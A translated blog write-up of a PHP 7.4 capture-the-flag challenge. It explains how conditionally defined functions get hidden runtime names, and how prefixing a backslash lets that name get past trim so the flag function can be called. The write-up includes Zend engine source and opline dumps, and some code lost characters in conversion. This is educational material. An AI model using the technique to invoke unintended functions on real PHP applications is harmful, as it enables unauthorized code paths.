Knowledge Planet October 2023 PHP Function Challenge

This article was published on my blog on October 13th.

A few days ago, I posted a small challenge on the “Code Audit” Knowledge Planet: https://t.zsxq.com/13bFX1N8F

<?php
$password = trim($_REQUEST['password']  '');
$name = trim($_REQUEST['name']  'viewsource');
function viewsource() {show_source(__FILE__);}

if (strcmp(hash('sha256', $password), 'ca572756809c324632167240d208681a03b4bd483036581a6190789165e1387a') === 0) {
    function readflag() {
        echo 'flag';
    }
}

$name();
?>

The execution environment is PHP7.4, and the goal is to read the flag.

This code is very simple. I added some confusing factors, such as functions such as trim, strcmp, and hash, but in fact the core is the same as These interference factors don’t matter, let’s do a simple analysis.

Understanding the PHP script execution process

I am not an expert in C language and the underlying principles of PHP. I can only use some simple language to describe the process of PHP script compilation and execution.

Like most other scripting languages, PHP execution is divided into two parts:

  • The process of compiling source code into Zend virtual machine instructions (called opline in PHP)

  • The process of Zend virtual machine executing machine instructions

The former will be divided into the following steps:

  • Call zendparse to complete lexical analysis, syntax analysis, and generate AST tree

  • Call init_op_array, zend_compile_top_stmt to complete the conversion of AST to opline array

  • Call pass_two to complete the conversion of compile-time to runtime information, and set the handler corresponding to each opcode.

The latter gets the compiled opline array and executes each opcode in sequence. In fact, it executes the handler corresponding to each opcode to complete the execution of the PHP script. We refer to the method of remote debugging ZendVM that I shared on the “Code Audit” planet. Find the zend_execute_scripts function and you can see the general logic:

94d74ef91f8081d3678b85a269174007.png

What we want to focus on is the compilation phase of the PHP code. When PHP compiles “function definition”, it will use the zend_compile_func_decl function:

void zend_compile_func_decl(znode *result, zend_ast *ast, zend_bool toplevel) /* {<!-- -->{<!-- -->{ */
{
    ...
    zend_ast_decl *decl = (zend_ast_decl *) ast;
    zend_bool is_method = decl->kind == ZEND_AST_METHOD;
    if (is_method) {
  zend_bool has_body = stmt_ast != NULL;
  zend_begin_method_decl(op_array, decl->name, has_body);
 } else {
  zend_begin_func_decl(result, op_array, decl, toplevel);
  if (decl->kind == ZEND_AST_ARROW_FUNC) {
   find_implicit_binds( & amp;info, params_ast, stmt_ast);
   compile_implicit_lexical_binds( & amp;info, result, op_array);
  } else if (uses_ast) {
   zend_compile_closure_binding(result, op_array, uses_ast);
  }
 }
}

It can be seen that the logic for processing class methods and ordinary functions is all together. This function has a key parameter called toplevel. As you can guess from the name, this parameter indicates whether the current function definition is in the top-level scope. We follow up with zend_begin_func_decl for handling ordinary functions:

static void zend_begin_func_decl(znode *result, zend_op_array *op_array, zend_ast_decl *decl, zend_bool toplevel) /* {<!-- -->{<!-- -->{ */
{
    ...
    zend_register_seen_symbol(lcname, ZEND_SYMBOL_FUNCTION);
 if (toplevel) {
  if (UNEXPECTED(zend_hash_add_ptr(CG(function_table), lcname, op_array) == NULL)) {
   do_bind_function_error(lcname, op_array, 1);
  }
  zend_string_release_ex(lcname, 0);
  return;
 }
    
    /* Generate RTD keys until we find one that isn't in use yet. */
 key = NULL;
 do {
  zend_tmp_string_release(key);
  key = zend_build_runtime_definition_key(lcname, decl->start_lineno);
 } while (!zend_hash_add_ptr(CG(function_table), key, op_array));
    
    ...
}

When toplevel is true, entering the first if statement logic is to directly add the current function name lcname to the function table; when toplevel When it is false, enter the following do while loop, use the zend_build_runtime_definition_key function to generate a key, and add the key as the function name to the function table.

In other words, depending on where the function is located (whether it is a top-level scope), the function name generated when PHP is compiled will be different.

We can try to execute the following code under PHP7.4:

<?php
function func1() {
    echo 'func1';
}

if (true) {
    function func2() {
        echo 'func2';
    }
}

When compiling the first function, it will enter the if (toplevel) condition. At this time, lcname is func1:

3409b87df56c131a13c3af284d144610.png

When lcname is func2, execution enters the do while loop, at which time a zend_build_runtime_definition_key function will generate a key is used as the function name of this function:

466bf5379f14dbbe7e51078c035709a6.png

Let’s press F11 to enter the function and see what the logic is:

2e318b5a2c61c2642a7cf47e268e36ac.png

It can be seen that the core of this function is a string formatting, and the final key is generated according to the following algorithm:

'\0' + name + filename + ':' + start_lineno + '$' + rtd_key_counter

Except for the first 0 character, the following four parts have the following meanings:

  • name function name

  • filename PHP file absolute path

  • start_lineno Function start definition line number (1 is the first line)

  • rtd_key_counter A global access count, which will increase by 1 each time it is executed, starting from 0

So, you can see in my debug screenshot above that my current value of result->val is \0func2/root/source/php-src/tests/web/ctf3 .php:7$0.

In other words, the function name finally saved in the function table is the above string starting with \0.

Opline differences caused by the scope of the function

In the previous section, we briefly analyzed the compilation logic when the function is located in a non-top-level scope from the perspective of debugging. When analyzing the zend_begin_func_decl function above, I also observed that when toplevel is false, PHP will call get_next_op() to generate a new opline, but not true.

Let’s take a look at the differences between the two in opline.

Using the vld extension, we can view oplines of PHP code. Let’s first take a look at the oplines of the following code:

<?php
function func1() {
    echo 'func1';
}
func1();

c6362d43e2ccb7ca2cc4f7bed8d9cf74.png

It can be seen that there is no opcode for function definition here. The two opcodes starting from line 5 are INIT_FCALL and DO_FCALL, which are used to execute functions.

Take a look at the opline of the following code:

<?php
if (true) {
    function func2() {
        echo 'func2';
    }
}
func2();

b70e3829581ad48221bb4599908e83bc.png

It is obvious to see two differences:

  • More OPCODE DECLARE_FUNCTION for defining functions

  • The INIT_FCALL used when executing the function becomes INIT_FCALL_BY_NAME

When PHP compiles a non-top-level scope function, the original function name and the generated key will be stored sequentially in the attributes of the DECLARE_FUNCTION opline, and will only be executed when the DECLARE_FUNCTION opcode is executed. Put the real original function name into the function table.

In other words, if the scope is not a top-level function, a function name starting with \0 will first be placed in the function table during the compilation phase, and then DECLARE_FUNCTION during the execution phase. >The processor will put the real function name into the function table.

So, back to the challenge at the beginning of this article, because we cannot solve the strcmp comparison in the if statement, we cannot enter the if statement to execute DECLARE_FUNCTION. When executing $name() later, you cannot use the original name of the function readflag to call the function, but you need to use the one starting with \0 function name to call.

Bypass trim filtering

Following the above idea, I calculated the key according to the algorithm of zend_build_runtime_definition_key and sent it as the function name:

a887f433fe2baabfcb45c77dc4e16a47.png

The Call to undefined function exception still occurs. What is the reason?

In fact, I left another pit, which is trim. The trim function will remove whitespace characters at the beginning and end of the string when receiving parameters. The blank characters here include the following six characters: \
\r\t\v\0
. I was in the “writeup of several “Three White Hats” competitions in 2016″ introduced in this article.

In other words, the first \0 character of the name passed in by the user is filtered out by trim, resulting in the function being unable to be called normally.

Let’s see how to solve it. First, the opcode used for dynamic function calls is INIT_DYNAMIC_CALL, which we can see using vld. Then find the corresponding handler in the PHP source code:

static ZEND_OPCODE_HANDLER_RET ZEND_FASTCALL ZEND_INIT_DYNAMIC_CALL_SPEC_CONST_HANDLER(ZEND_OPCODE_HANDLER_ARGS)
{
 USE_OPLINE

 zval *function_name;
 zend_execute_data *call;

 SAVE_OPLINE();
 function_name = RT_CONSTANT(opline, opline->op2);

try_function_name:
 if (IS_CONST != IS_CONST & amp; & amp; EXPECTED(Z_TYPE_P(function_name) == IS_STRING)) {
  call = zend_init_dynamic_call_string(Z_STR_P(function_name), opline->extended_value);
 } else if (IS_CONST != IS_CONST & amp; & amp; EXPECTED(Z_TYPE_P(function_name) == IS_OBJECT)) {
  call = zend_init_dynamic_call_object(function_name, opline->extended_value);
 } else if (EXPECTED(Z_TYPE_P(function_name) == IS_ARRAY)) {
  call = zend_init_dynamic_call_array(Z_ARRVAL_P(function_name), opline->extended_value);
 }
    ...
}

When the function name is a string, zend_init_dynamic_call_string will be executed:

static zend_never_inline zend_execute_data *zend_init_dynamic_call_string(zend_string *function, uint32_t num_args) /* {<!-- -->{<!-- -->{ */
{
    if ((colon = zend_memrchr(ZSTR_VAL(function), ':', ZSTR_LEN(function))) != NULL & amp; & amp;
  colon > ZSTR_VAL(function) & amp; & amp;
  *(colon-1) == ':'
 ) {
        ...
    } else {
        if (ZSTR_VAL(function)[0] == '') {
   lcname = zend_string_alloc(ZSTR_LEN(function) - 1, 0);
   zend_str_tolower_copy(ZSTR_VAL(lcname), ZSTR_VAL(function) + 1, ZSTR_LEN(function) - 1);
  } else {
   lcname = zend_string_tolower(function);
  }
  if (UNEXPECTED((func = zend_hash_find(EG(function_table), lcname)) == NULL)) {
   zend_throw_error(NULL, "Call to undefined function %s()", ZSTR_VAL(function));
   zend_string_release_ex(lcname, 0);
   return NULL;
  }
        ...
    }
    ...
}

In the else statement, the first character of the function name is judged. If it is a backslash \, remove it and search in the function table.

This logic is easy to understand when put into PHP code, which is to remove the backslash of the root namespace. All PHP internal functions and functions without a specified namespace can be called using \ as the namespace, such as \phpinfo(). “Code Audit” The first question of the Code Breaking 2018 Challenge hosted by Knowledge Planet took advantage of this feature. Students who have forgotten it can review it: https://t.zsxq.com/BIuNniY, https://paper.seebug. org/755/.

Therefore, here we add \ to the front of name and send the data packet again, and we can get the flag:

199079a9f7ce8023b650168cf432cc5b.png

But please note that because it was called just once, the last rtd_key_counter of the name here becomes 1, and the value will increase by 1 every time this file is accessed.

Changes in PHP 8.1

For the code in this question, I limited the execution environment to PHP7.4. The reason is that in PHP8.1 and later, the feature of using temporary function names when compiling PHP has been deleted.

The PR involved in this modification is https://github.com/php/php-src/pull/5595. The reason why PHP officially deleted this feature has nothing to do with our article, but the memory occupied by this temporary function is In some cases it will not be released, causing memory leaks.

The official has directly deleted the logic related to generating temporary function names in zend_begin_func_decl:

6080f345258c354d4ceade169c410e87.png

However, the zend_build_runtime_definition_key function has not been deleted. This function will still be called to generate a temporary class name when defining a non-top-level domain class. This is another problem. This article will not be extended. This is a tinkering. With some tinkering, you can come up with a similar CTF question.

cca83e492851f8c36d0160f99948a2ec.gif

If you like this article, click Reading before leaving~